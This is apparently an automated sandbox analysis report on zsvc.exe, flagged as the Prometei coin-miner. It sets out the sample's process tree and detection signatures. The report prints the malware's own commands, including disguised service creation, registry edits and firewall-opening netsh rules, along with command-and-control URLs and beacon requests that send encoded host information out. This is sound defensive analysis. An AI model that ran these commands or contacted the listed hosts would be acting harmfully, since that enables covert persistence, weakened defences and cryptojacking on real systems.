Loading ...

Play interactive tourEdit tour

Analysis Report zsvc.exe

Overview

General Information

Sample Name:zsvc.exe
Analysis ID:373955
MD5:84452e3633c40030e72c9375c8a3cacb
SHA1:fe65853ff86e5783c3d70edcbe0771447967ab0c
SHA256:f0a5b257f16c4ccff520365ebc143f09ccf233e642bf540b5b90a2bbdb43d5b4
Infos:

Most interesting Screenshot:

Detection

CoinMiner Prometei
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected CoinMiner
Yara detected Prometei
Creates files in the system32 config directory
Found Tor onion address
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses netsh to modify the Windows network and firewall settings
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Netsh Port or Application Allowed
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • svchost.exe (PID: 1720 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • zsvc.exe (PID: 4088 cmdline: 'C:\Users\user\Desktop\zsvc.exe' MD5: 84452E3633C40030E72C9375C8A3CACB)
    • cmd.exe (PID: 5476 cmdline: 'C:\Windows\System32\cmd.exe' /C copy /y 'c:\users\user\desktop\zsvc.exe' C:\windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5932 cmdline: cmd.exe /c sc query UPlugPlay MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • sc.exe (PID: 5076 cmdline: sc query UPlugPlay MD5: D79784553A9410D15E04766AAAB77CD6)
    • cmd.exe (PID: 5800 cmdline: 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 3704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 3164 cmdline: netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes MD5: 98CC37BBF363A38834253E22C80A8F32)
      • netsh.exe (PID: 5076 cmdline: netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE MD5: 98CC37BBF363A38834253E22C80A8F32)
    • cmd.exe (PID: 5552 cmdline: 'C:\Windows\System32\cmd.exe' /C sc delete UPlugPlay&sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • sc.exe (PID: 6024 cmdline: sc delete UPlugPlay MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 6152 cmdline: sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore MD5: D79784553A9410D15E04766AAAB77CD6)
    • cmd.exe (PID: 3260 cmdline: 'C:\Windows\System32\cmd.exe' /C reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 5452 cmdline: reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc' MD5: E3DACF0B31841FA02064B4457D44B357)
    • cmd.exe (PID: 4424 cmdline: 'C:\Windows\System32\cmd.exe' /C sc config UPlugPlay start= auto MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • sc.exe (PID: 5988 cmdline: sc config UPlugPlay start= auto MD5: D79784553A9410D15E04766AAAB77CD6)
    • cmd.exe (PID: 6080 cmdline: 'C:\Windows\System32\cmd.exe' /C ren C:\windows\zsvc.exe sqhost.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6236 cmdline: 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • sc.exe (PID: 6280 cmdline: sc start UPlugPlay MD5: D79784553A9410D15E04766AAAB77CD6)
    • cmd.exe (PID: 6288 cmdline: 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • sc.exe (PID: 6376 cmdline: sc start UPlugPlay MD5: D79784553A9410D15E04766AAAB77CD6)
  • sqhost.exe (PID: 6304 cmdline: c:\windows\sqhost.exe Dcomsvc MD5: 84452E3633C40030E72C9375C8A3CACB)
    • sqhost.exe (PID: 6344 cmdline: c:\windows\sqhost.exe -watchdog MD5: 84452E3633C40030E72C9375C8A3CACB)
    • cmd.exe (PID: 6424 cmdline: 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall delete rule name='Banned brute IPs' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 6496 cmdline: netsh advfirewall firewall delete rule name='Banned brute IPs' MD5: 98CC37BBF363A38834253E22C80A8F32)
    • cmd.exe (PID: 6440 cmdline: 'C:\Windows\System32\cmd.exe' /C Auditpol /set /subcategory:'Logon' /failure:enable MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • auditpol.exe (PID: 6528 cmdline: Auditpol /set /subcategory:'Logon' /failure:enable MD5: 6AA4D93CA898F6906B065323E2F0839A)
    • WMIC.exe (PID: 6780 cmdline: wmic baseboard get product MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 6912 cmdline: wmic baseboard get product MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmpJoeSecurity_CoinMinerYara detected CoinMinerJoe Security
    00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmpJoeSecurity_PrometeiYara detected PrometeiJoe Security
      0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmpJoeSecurity_CoinMinerYara detected CoinMinerJoe Security
        0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmpJoeSecurity_PrometeiYara detected PrometeiJoe Security
          0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmpJoeSecurity_CoinMinerYara detected CoinMinerJoe Security
            Click to see the 3 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Netsh Port or Application AllowedShow sources
            Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE, CommandLine: 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Users\user\Desktop\zsvc.exe' , ParentImage: C:\Users\user\Desktop\zsvc.exe, ParentProcessId: 4088, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE, ProcessId: 5800

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for domain / URLShow sources
            Source: p1.feefreepool.netVirustotal: Detection: 9%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Windows\zsvc.exeReversingLabs: Detection: 68%
            Multi AV Scanner detection for submitted fileShow sources
            Source: zsvc.exeVirustotal: Detection: 70%Perma Link
            Source: zsvc.exeReversingLabs: Detection: 68%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Windows\zsvc.exeJoe Sandbox ML: detected
            Machine Learning detection for sampleShow sources
            Source: zsvc.exeJoe Sandbox ML: detected

            Bitcoin Miner:

            barindex
            Yara detected CoinMinerShow sources
            Source: Yara matchFile source: 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: sqhost.exe PID: 6344, type: MEMORY
            Yara detected PrometeiShow sources
            Source: Yara matchFile source: 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: sqhost.exe PID: 6344, type: MEMORY

            Networking:

            barindex
            Found Tor onion addressShow sources
            Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
            Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmpString found in binary or memory: IpAddress<>C:\Windows\temp\brute_inhibitor.dat&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block remoteip=/C netsh advfirewall firewall delete rule name="Banned brute IPs"&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block localip=SeDebugPrivilegeNONE_MAPPED\%d %sNT AUTHORITY\SYSTEM %s\*...%s\%s{"i":"execver?r=&i=&ver=touchtop&answ=sysinfo?add=&h=&enckey=call-watchdog/C netsh advfirewall firewall delete rule name="Banned brute IPs"/C Auditpol /set /subcategory:"Logon" /failure:enableSecurityEvent/System[EventID=4625]CommTimeoutCommModehttp://p1.feefreepool.net/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiUseVendorUrl0SOFTWARE\Intel\SupporthttpUseVendorUrl1Autoexec1Autoexec2taskkill_pathsearchNOT FOUNDchkport:extip&extip=enc01updatewbset_timeoutset_cc0set_cc1set_autoexec1set_autoexec2touch_internaltouch_stopwgetxwgetstop_miningstart_miningstart_mining1quitquit2OK - valid code
            Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
            Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgipi.dllD
            Source: sqhost.exe, 0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmpString found in binary or memory: IpAddress<>C:\Windows\temp\brute_inhibitor.dat&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block remoteip=/C netsh advfirewall firewall delete rule name="Banned brute IPs"&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block localip=SeDebugPrivilegeNONE_MAPPED\%d %sNT AUTHORITY\SYSTEM %s\*...%s\%s{"i":"execver?r=&i=&ver=touchtop&answ=sysinfo?add=&h=&enckey=call-watchdog/C netsh advfirewall firewall delete rule name="Banned brute IPs"/C Auditpol /set /subcategory:"Logon" /failure:enableSecurityEvent/System[EventID=4625]CommTimeoutCommModehttp://p1.feefreepool.net/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiUseVendorUrl0SOFTWARE\Intel\SupporthttpUseVendorUrl1Autoexec1Autoexec2taskkill_pathsearchNOT FOUNDchkport:extip&extip=enc01updatewbset_timeoutset_cc0set_cc1set_autoexec1set_autoexec2touch_internaltouch_stopwgetxwgetstop_miningstart_miningstart_mining1quitquit2OK - valid code
            Source: sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
            Source: sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmpString found in binary or memory: IpAddress<>C:\Windows\temp\brute_inhibitor.dat&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block remoteip=/C netsh advfirewall firewall delete rule name="Banned brute IPs"&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block localip=SeDebugPrivilegeNONE_MAPPED\%d %sNT AUTHORITY\SYSTEM %s\*...%s\%s{"i":"execver?r=&i=&ver=touchtop&answ=sysinfo?add=&h=&enckey=call-watchdog/C netsh advfirewall firewall delete rule name="Banned brute IPs"/C Auditpol /set /subcategory:"Logon" /failure:enableSecurityEvent/System[EventID=4625]CommTimeoutCommModehttp://p1.feefreepool.net/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiUseVendorUrl0SOFTWARE\Intel\SupporthttpUseVendorUrl1Autoexec1Autoexec2taskkill_pathsearchNOT FOUNDchkport:extip&extip=enc01updatewbset_timeoutset_cc0set_cc1set_autoexec1set_autoexec2touch_internaltouch_stopwgetxwgetstop_miningstart_miningstart_mining1quitquit2OK - valid code
            Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271 HTTP/1.0Host: p1.feefreepool.net
            Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJbnRlbChSKSBDb3JlKFRNKTIgQ1BVIDY2MDAgQCAyLjQwIEdIeg0KDQoNClNGMURFUzlLQVMNCk5TT3V3IE9mDQoNCjEwLjAuMTcxMzQuMQ0KDQoNCjIwMjAwOTMwMDgwMjI5LjQ5MzE3Ny00MjANCk1pY3Jvc29mdCBXaW5kb3dzIDEwIFBybw0KfQ0K&h=computer&i=90Z405GXDA2Q5271&enckey=BtO0tzJv2apOB7qyzIW7zWStGW/UHBc4Xxf1Kg/hg-0ejQgNvvOI-nwRaXMjLhcvacc8U4MXZ7rGYP3FggtsNhWMcIqYeNGD/JknHi-IV66WOa6UuMMRKvZg2a3fLLQAOxVELNFmUML3ZKJUE7iUbF/IJ7fzTHFAPCETqP4WJyQ_ HTTP/1.0Host: p1.feefreepool.net
            Source: Joe Sandbox ViewIP Address: 88.198.246.242 88.198.246.242
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271 HTTP/1.0Host: p1.feefreepool.net
            Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJbnRlbChSKSBDb3JlKFRNKTIgQ1BVIDY2MDAgQCAyLjQwIEdIeg0KDQoNClNGMURFUzlLQVMNCk5TT3V3IE9mDQoNCjEwLjAuMTcxMzQuMQ0KDQoNCjIwMjAwOTMwMDgwMjI5LjQ5MzE3Ny00MjANCk1pY3Jvc29mdCBXaW5kb3dzIDEwIFBybw0KfQ0K&h=computer&i=90Z405GXDA2Q5271&enckey=BtO0tzJv2apOB7qyzIW7zWStGW/UHBc4Xxf1Kg/hg-0ejQgNvvOI-nwRaXMjLhcvacc8U4MXZ7rGYP3FggtsNhWMcIqYeNGD/JknHi-IV66WOa6UuMMRKvZg2a3fLLQAOxVELNFmUML3ZKJUE7iUbF/IJ7fzTHFAPCETqP4WJyQ_ HTTP/1.0Host: p1.feefreepool.net
            Source: unknownDNS traffic detected: queries for: p1.feefreepool.net
            Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmpString found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
            Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmpString found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiW
            Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmpString found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgi
            Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmpString found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgifier
            Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmpString found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgi
            Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmpString found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJb
            Source: sqhost.exe, 0000001B.00000002.468366246.000000000056B000.00000004.00000020.sdmpString found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271
            Source: sqhost.exe, 0000001B.00000002.468366246.000000000056B000.00000004.00000020.sdmpString found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q52710003
            Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmpString found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgiexe
            Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmpString found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpj
            Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
            Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgipi.dllD
            Source: C:\Users\user\Desktop\zsvc.exeFile created: C:\Windows\dellJump to behavior
            Source: C:\Windows\System32\auditpol.exeProcess token adjusted: SecurityJump to behavior
            Source: zsvc.exe, 00000001.00000002.222640909.000000014128E000.00000004.00020000.sdmpBinary or memory string: OriginalFilenamesqhost.exe6 vs zsvc.exe
            Source: zsvc.exe, 00000001.00000002.221716042.00000000008F0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs zsvc.exe
            Source: zsvc.exe, 00000001.00000002.221760215.0000000000940000.00000002.00000001.sdmpBinary or memory string: originalfilename vs zsvc.exe
            Source: zsvc.exe, 00000001.00000002.221760215.0000000000940000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs zsvc.exe
            Source: zsvc.exeBinary or memory string: OriginalFilenamesqhost.exe6 vs zsvc.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc'
            Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@69/5@2/1
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6456:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1748:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3704:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6824:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6312:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6432:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_01
            Source: C:\Users\user\Desktop\zsvc.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\sqhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\sqhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\sqhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: zsvc.exeVirustotal: Detection: 70%
            Source: zsvc.exeReversingLabs: Detection: 68%
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Users\user\Desktop\zsvc.exe 'C:\Users\user\Desktop\zsvc.exe'
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C copy /y 'c:\users\user\desktop\zsvc.exe' C:\windows
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc query UPlugPlay
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query UPlugPlay
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc delete UPlugPlay&sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc config UPlugPlay start= auto
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete UPlugPlay
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
